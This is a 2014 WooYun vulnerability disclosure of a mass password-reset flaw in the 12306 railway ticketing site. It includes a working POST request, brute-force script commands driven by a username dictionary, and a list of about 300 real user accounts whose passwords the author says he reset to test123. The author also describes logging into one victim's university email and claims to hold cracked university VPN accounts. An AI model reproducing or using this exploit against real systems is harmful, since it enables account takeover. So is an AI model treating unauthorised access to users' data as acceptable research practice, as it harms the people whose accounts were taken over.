当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-063813

漏洞标题:演示12306批量重置密码漏洞(可修改多个用户密码)

相关厂商:中国铁道科学研究院

漏洞作者: lijiejie

提交时间:2014-06-06 21:13

修复时间:2014-06-11 14:41

公开时间:2014-06-11 14:41

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:16

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-06: 细节已通知厂商并且等待厂商处理中
2014-06-09: 厂商已经确认,细节仅向厂商公开
2014-06-11: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

之前提给12306的漏洞被忽略了:http://www.wooyun.org/bugs/wooyun-2014-063025,哥还是详细演示下利用方法吧。。。

详细说明:

利用之前ping一下kyfw.12306.cn,然后修改hosts,固定解析到该IP。
POST:

POST /otn/forgetPassword/findPasswordByPromptAnswer HTTP/1.1
Host: kyfw.12306.cn
Connection: keep-alive
Content-Length: 228
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://kyfw.12306.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://kyfw.12306.cn/otn/forgetPassword/initforgetMyPassword
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=0A1E82A1441AF4843295A39FF9A11E51; BIGipServerotn=2362704138.38945.0000
userDTO.loginUserDTO.user_name=anfeng&userDTO.pwd_question=%E6%82%A8%E7%9A%84%E5%87%BA%E7%94%9F%E5%9C%B0%E6%98%AF%EF%BC%9F&userDTO.pwd_answer=%E4%B8%8A%E6%B5%B7&userDTO.password_new=test123&confirmPassWord=test123&randCodes=u6hc


其中session id和randCodes根据自己的值修改即可。
下载哥写的脚本(http://www.lijiejie.com/htpwdscan-http-weakpass-scanner/),分别执行:

htpwdScan.py -f=post12306.txt -https -d userDTO.loginUserDTO.user_name=pinyin2.txt -err=existError\":\"Y -debug


htpwdScan.py -f=post12306.txt -https -d userDTO.loginUserDTO.user_name=C:/cygwin/home/pinyin2.txt -err=existError\":\"Y -o=12306.txt


在12306.txt中,你可以得到密码已经被修改为test123的用户们。
上面的HTTP请求中,可以为答案设置额外的字典。

漏洞证明:

以下账号密码都被修改为test123,不信你试几个?

aidong
anfeng
banbing
bangka
baoquan
bianfang
binger
caituo
caizhi
caorun
chaifang
changyan
chaoang
chaowei
chendiu
chenning
chensi
chengna
chonglai
chuaizhuo
chuandan
conghua
cuanzheng
cuixing
cuizhou
daidong
dequan
dengyang
diexian
douniang
dugong
duangang
dunpai
fanlei
feigeng
douzhuo
gainai
gaishu
gangqin
gening
geixiao
genneng
gongnei
guainian
guaizhe
guanshuang
guangpin
nuanxiao
paizhang
pangai
panlei
pangai
pangshe
paogao
peizhi
pinsan
qianduan
qieshuang
qingneng
qiujing
quliang
quemei
quexin
qundao
ranjing
renmin
rilang
rongzhai
rouran
ruanlei
ruannan
sanshou
shaleng
shaiyan
shangdao
shangji
shaohong
shenping
shenshuo
shigun
shijia
shijing
shudun
shuxin
shuagun
shunshai
songan
suibian
sunjin
sunjing
suogua
tangxiong
tianma
tingleng
tongdian
tuibian
tuirong
waizhan
wanchen
wangrong
weinei
wenlan
xianglong
xiaofei
xiaoqin
xiaosa
xiaosong
xiechong
xinggu
xingzang
xiongfang
xiongkai
xiupao
xiuzuo
xuanli
xunxun
yajing
yanchen
yangsa
yaoyun
yilang
yinmei
youhang
yuangeng
yueyong
zancheng
zangnuo
zaoling
zhaili
zhaizang
zhaokuan
zhaoying
zhengeng
zhengjin
zhipian
zhongshui
zhubiao
zhuyuan
zhuawo
zhuaichu
zhuanghong
zongcai
zongnuo
zouying
zuzheng
zuolou
zuosha
bantan
benqiao
biaoneng
binqian
bingdui
bochui
boqing
cangjia
chajie
chaqin
chanxun
chefeng
chenyin
chengfu
chengliu
chixiang
chulia
chuping
chuzhuang
chuangchu
cichan
ciling
cuiniao
daigang
daipin
danjin
danglei
deiseng
dengfu
dengzhou
dielao
diemei
dinglin
dinglu
dingpan
dingyue
duhuai
duming
duanzhao
duotuan
enseng
fanghai
feichen
fenghong
fenglei
foguang
fufang
gennie
guasan
guaiha
guanyue
haqing
haxiao
hanchui
hanghao
hangzhen
heiqia
hentong
hongtian
houbin
hujiong
huading
huangfang
huanglei
huangli
huogong
jiping
jiareng
jiangqiang
jiaochu
jiehua
jiepan
jieying
jinpie
jinren
jingchuan
jiongbai
jiongxu
juchai
juanfang
jueruan
kanmin
kangrun
kaoshi
kaosun
kaowen
kejian
kekong
kengshen
kuaiying
kuikai
kuipin
landie
lanmie
lanseng
laomai
leiqiu
leixia
lenghai
liamin
liaqiong
lianfu
linnei
liuzhang
loujue
luqing
lushen
maigang
mehuan
meiwang
mengun
mengbai
mengda
mengren
mieduan
mindong
naidao
nanlan
nanrong
nengniu
niaorong
nieling
ningde
nongzhang
nuoliang
oushou
paiyao
pangceng
pangniang
pangwu
pishen
pinqiao
qiahua
qianshu
qiaojiong
qinxun
qingsuo
qiongfa
qiongge
qiuran
quanjiao
quepeng
quetong
qunkang
rexuan
renqian
rengren
rongxu
rouzhou
ruanmin
ruoshun
shaqing
shazhong
shanhai
shanlian
shanshuang
shanxun
shaoyin
shendian
shennan
shensuan
shengjun
shihuan
shihua
shinei
shujiu
shuaxiong
shuima
shunjing
taikui
tenggang
tengyong
tizheng
tiewang
tongnuo
tongshan
tuixiu
tuoren
waichou
wanping
weihong
weishei
wensuo
woseng
xiashun
xiannian
xiantu
xiangma
xiaoling
xieming
xingzhong
yanyin
yaosang
yingcai
yinggong
yingnong
youmei
yunniu
yunpian
zaidou
zaijiao
zaoshen
zeifang
zeishui
zenning
zhashe
zhaozhong
zhegen
zhenzen
zhibang
zhihua
zhihao
zhuzhong
zhuachen
zhuangchun
zhuangye
zongjun
zongzong
zunkun


我随便挑了个账号进去看(对天发誓,中间随便挑的),一看,居然是清华邮箱啊。 随手拿电话号登录邮箱,轻轻松松登录进入了,额。。。 鉴于早就破解了清华北大的VPN账号若干,就没有必要继续玩清华了

12306_info.png


tsinghua_mail.png


修复方案:

你们更专业

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2014-06-09 08:24

厂商回复:

谢谢

最新状态:

2014-06-11:已经修复,多谢!